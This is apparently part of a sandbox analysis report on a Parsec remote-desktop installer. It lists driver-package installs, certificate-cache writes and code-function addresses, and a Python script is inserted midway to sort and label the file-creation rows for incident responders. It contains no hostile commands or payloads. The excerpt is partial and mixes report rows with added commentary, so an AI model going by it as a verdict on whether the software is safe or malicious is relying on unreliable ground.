Source: C:\Program Files\Parsec\vdd\parsec-vdd.exe | Code function: 65_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,CoUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | File created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\329B6147266C1E26CD774EA22B79EC2E
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\329B6147266C1E26CD774EA22B79EC2E
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1A374813EDB1A6631387E414D3E73232
Source: C:\Program Files\Parsec\pservice.exe | File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1A374813EDB1A6631387E414D3E73232
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\drvstore.tmp
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\inf\oem4.inf
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\System32\DriverStore\drvstore.tmp
Source: C:\Windows\System32\drvinst.exe | File created: C:\Windows\inf\oem5.inf
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe | File created: C:\Windows\INF\c_display.PNF
Source: C:\Windows\System32\drvinst.exe | File deleted: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\SET636D.tmp
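The file rows in this section and the dropped-file rows earlier on the page read better once they are sorted by where the write landed and what was written. The script below is an added example, not Joe Sandbox output and not Parsec code; rows can be pasted in as they appear in a plain-text copy of the report (it tolerates both the cells-run-together form and the "Jump to dropped file" link text). It lists the DriverStore package directories and the oemN.inf names that show a third-party driver package was actually registered by the OS installer, pulls out any .sys written outside DriverStore (the copies to hash and signature-check), and labels the writes under systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache for what they are: CryptoAPI's download cache for CRL/OCSP/AIA fetches, which under systemprofile belongs to the SYSTEM account, the normal side effect of a service validating a signature and the reason the "creates files in the system32 config directory" signature fires here. The location and kind vocabularies and the ROWS sample are this example's own.

```python
"""Sort the report's 'File created/deleted' rows into something a responder can act on."""
from __future__ import annotations

import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed input: rows from this report as a plain-text copy of the page
# renders them, cells run together and the link text still attached.
ROWS = [
    r"Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\parsecvusba.cat (copy)Jump to dropped file",
    r"Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeFile created: C:\Users\user\AppData\Local\Temp\{a3ae9bde-474f-8049-a9b1-c003314cfbdb}\SET700F.tmpJump to dropped file",
    r"Source: C:\Program Files\Parsec\pservice.exeFile created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426Jump to dropped file",
    r"Source: C:\Program Files\Parsec\vusb\parsec-vud.exeFile created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys",
    r"Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeFile created: C:\Program Files\Parsec Virtual Display Driver\driver\mm.catJump to dropped file",
    r"Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\FileRepository\parsecvusba.inf_amd64_dae154cc0d6f64e9",
    r"Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\inf\oem4.inf",
    r"Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\FileRepository\parsecvirtualds.inf_amd64_dabce1c8ac909510",
    r"Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\inf\oem5.inf",
    r"Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeFile created: C:\Windows\INF\c_display.PNF",
    r"Source: C:\Windows\System32\drvinst.exeFile deleted: C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\SET636D.tmp",
]

# Accepts "Source: X | File created: Y" as well as the run-together form, and
# drops the "Jump to dropped file" link text the page leaves behind.
_ROW = re.compile(
    r"^Source:\s*(?P<src>.*?)\s*\|?\s*File (?P<verb>created|deleted):\s*"
    r"(?P<path>.*?)\s*(?:\|?\s*Jump to dropped file)?\s*$"
)
# Location and kind labels are this example's own vocabulary.
_KINDS = {".sys": "driver", ".cat": "catalog", ".inf": "inf", ".pnf": "inf", ".tmp": "staging"}


@dataclass(frozen=True)
class FileEvent:
    source: str  # process that did the write (the report's Source cell)
    verb: str    # "created" or "deleted"
    path: str
    copy: bool   # the sandbox tags a file copied from elsewhere with "(copy)"


def parse_row(line: str) -> FileEvent | None:
    m = _ROW.match(line)
    if not m:
        return None
    path = m["path"]
    copy = path.endswith("(copy)")
    if copy:
        path = path[: -len("(copy)")].rstrip()
    return FileEvent(m["src"], m["verb"], path, copy)


def load(lines: list[str]) -> list[FileEvent]:
    return [ev for ev in map(parse_row, lines) if ev is not None]


def classify(path: str) -> tuple[str, str]:
    """(location, kind) for one path."""
    low = path.lower()
    if "\\cryptneturlcache\\" in low:
        # CryptoAPI's CRL/OCSP/AIA download cache; under systemprofile it is
        # the SYSTEM account's, i.e. a service validated a signature.
        location = "cryptnet-cache"
    elif "\\driverstore\\" in low:
        location = "driverstore"   # written by the OS driver installer (drvinst.exe)
    elif low.startswith("c:\\windows\\inf\\"):
        location = "inf-dir"
    elif "\\appdata\\local\\temp\\" in low:
        location = "user-temp"
    elif low.startswith("c:\\program files\\"):
        location = "program-files"
    else:
        location = "other"
    return location, _KINDS.get(PureWindowsPath(path).suffix.lower(), "other")


def installed_packages(events: list[FileEvent]) -> list[str]:
    """DriverStore package directories that appeared; the OS names them <inf>_<arch>_<hash>."""
    return sorted({PureWindowsPath(e.path).name for e in events if e.verb == "created"
                   and PureWindowsPath(e.path).parent.name.lower() == "filerepository"})


def oem_infs(events: list[FileEvent]) -> list[str]:
    """Third-party INFs registered in C:\\Windows\\INF get an oemN.inf name, one per package."""
    return sorted(PureWindowsPath(e.path).name for e in events
                  if e.verb == "created" and classify(e.path) == ("inf-dir", "inf")
                  and PureWindowsPath(e.path).name.lower().startswith("oem"))


def drivers_outside_driverstore(events: list[FileEvent]) -> list[tuple[str, str]]:
    """(writer, path) for every .sys dropped anywhere but DriverStore: hash and signature-check these."""
    found = []
    for e in events:
        location, kind = classify(e.path)
        if e.verb == "created" and kind == "driver" and location != "driverstore":
            found.append((e.source, e.path))
    return found


def touches_by_source(events: list[FileEvent]) -> dict[str, dict[str, int]]:
    """process name -> {location: count}, to see which process writes where."""
    out: dict[str, dict[str, int]] = {}
    for e in events:
        per = out.setdefault(PureWindowsPath(e.source).name, {})
        location, _ = classify(e.path)
        per[location] = per.get(location, 0) + 1
    return out


if __name__ == "__main__":
    evs = load(ROWS)
    print("packages:", installed_packages(evs))
    print("oem infs:", oem_infs(evs))
    print("drivers outside DriverStore:", drivers_outside_driverstore(evs))
    for proc, locs in touches_by_source(evs).items():
        print(f"{proc:16} {locs}")
```

Two package directories and two oemN.inf files means both driver packages were accepted by PnP on the sandbox VM; the single .sys written by parsec-vud.exe into Program Files is the file to carry into a signature check, since the report's own verdict is only that the top-level sample is unsigned, not that the driver is.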
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F9D078
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F85134
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00FC8806
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00FAD9EE
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F7798C
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F9AB24
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F9DD64
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00FAF022
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00FBF1EC
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F831C8
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00FC328C
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F91288
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F7C204
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00FCE4D1
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00FA541C
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00FB65F0
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00FCE5C0
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00FC469D
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F94640
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00FB87AC
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F8E8E0
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00FA1984
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00FA3BBC
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F8DCAC
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F77DE8
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00FCDD60
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F8DF78
Source: C:\Users\user\AppData\Roaming\PSecWin\7z.exe | Code function: 6_2_00F92F00
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Code function: 13_2_0040755C
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe | Code function: 13_2_00406D85
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD032130
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD036A28
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD03EE70
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD039A8C
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD035F0C
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD039128
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD035D24
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD035950
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD03557C
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD03BDA0
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD03E1C4
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD041E0C
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD03C420
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD040878
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD04A89C
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD03B8F0
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD0464E0
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD035B38
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD03A760
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD035764
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD037784
Source: C:\Program Files\Parsec\pservice.exe | Code function: 39_2_00007FF7CD0373B8
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Code function: 45_2_0040755C
Source: C:\Program Files\Parsec\vusb\parsec-vud.exe | Code function: 45_2_00406D85
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C2F4DD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C304740
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C3168F0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C303190
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C350490
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C3014B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C339D5C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C34DD94
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C34FDF4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C308DD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C347E1C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C348EE4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C32FF5C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C310FE0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C32E090
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C2F7060
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C34C95C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C3139B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C3369B8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C311A80
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C2F4A80
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C31EAA0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C32EAB4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C31DB70
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C2F2BF0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C341C70
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C340CDC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C339564
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C33E544
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C3435E4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C34A24C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C32F5C8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C34065C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C32E6A4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C33D6AC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C311790
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C343860
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C3388F0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C32E8B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C3148D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C332130
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C3391B8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C3401C8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C31F260
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C2F3220
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C32E294
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C34A24C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C330360
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C2F43A0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C34B44C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C2FC4D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C32E4A0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe | Code function: 48_2_00007FF72C3364AC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 51_2_00007FF7E5AA68B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 51_2_00007FF7E5A94740
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 51_2_00007FF7E5ADF770
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 51_2_00007FF7E5A93190
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 51_2_00007FF7E5A914B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 51_2_00007FF7E5A98DD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 51_2_00007FF7E5AC1960
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 51_2_00007FF7E5AD2CE4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 51_2_00007FF7E5AD85E4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe | Code function: 51_2_00007FF7E5AD751C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AC958951_2_00007FF7E5AC9589
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AA48D051_2_00007FF7E5AA48D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ACF8C851_2_00007FF7E5ACF8C8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABD8C051_2_00007FF7E5ABD8C0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ADA72C51_2_00007FF7E5ADA72C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AA179051_2_00007FF7E5AA1790
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABF78C51_2_00007FF7E5ABF78C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABE2E451_2_00007FF7E5ABE2E4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A8322051_2_00007FF7E5A83220
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AAD26051_2_00007FF7E5AAD260
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AC61E851_2_00007FF7E5AC61E8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AC812051_2_00007FF7E5AC8120
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AAE19051_2_00007FF7E5AAE190
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A8C4D051_2_00007FF7E5A8C4D0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A843A051_2_00007FF7E5A843A0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AD03DC51_2_00007FF7E5AD03DC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AD137051_2_00007FF7E5AD1370
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABDED451_2_00007FF7E5ABDED4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A84DD051_2_00007FF7E5A84DD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABEDF851_2_00007FF7E5ABEDF8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AC8D9451_2_00007FF7E5AC8D94
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ACCD7051_2_00007FF7E5ACCD70
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ACFD5C51_2_00007FF7E5ACFD5C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ADF0D451_2_00007FF7E5ADF0D4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABE0E051_2_00007FF7E5ABE0E0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ADD07451_2_00007FF7E5ADD074
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A8706051_2_00007FF7E5A87060
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AA0FE051_2_00007FF7E5AA0FE0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AD2F6051_2_00007FF7E5AD2F60
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABDAC451_2_00007FF7E5ABDAC4
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AA1A8051_2_00007FF7E5AA1A80
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A84A8051_2_00007FF7E5A84A80
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AA39B051_2_00007FF7E5AA39B0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AC89E851_2_00007FF7E5AC89E8
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABDCD051_2_00007FF7E5ABDCD0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5AC5CDC51_2_00007FF7E5AC5CDC
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ACDC4051_2_00007FF7E5ACDC40
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ADBC3C51_2_00007FF7E5ADBC3C
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5A82BF051_2_00007FF7E5A82BF0
Source: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exeCode function: 51_2_00007FF7E5ABFB9051_2_00007FF7E5ABFB90
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 65_2_0040755C65_2_0040755C
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeCode function: 65_2_00406D8565_2_00406D85
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61818196071_2_00007FF618181960
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181889E871_2_00007FF6181889E8
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618192CE471_2_00007FF618192CE4
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618158DD071_2_00007FF618158DD0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61815319071_2_00007FF618153190
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181514B071_2_00007FF6181514B0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61814C4D071_2_00007FF61814C4D0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61819F77071_2_00007FF61819F770
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF61815474071_2_00007FF618154740
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181668B071_2_00007FF6181668B0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF6181639B071_2_00007FF6181639B0
Source: C:\Program Files\Parsec Virtual Display Driver\nefconw.exeCode function: 71_2_00007FF618144A8071_2_00007FF618144A80
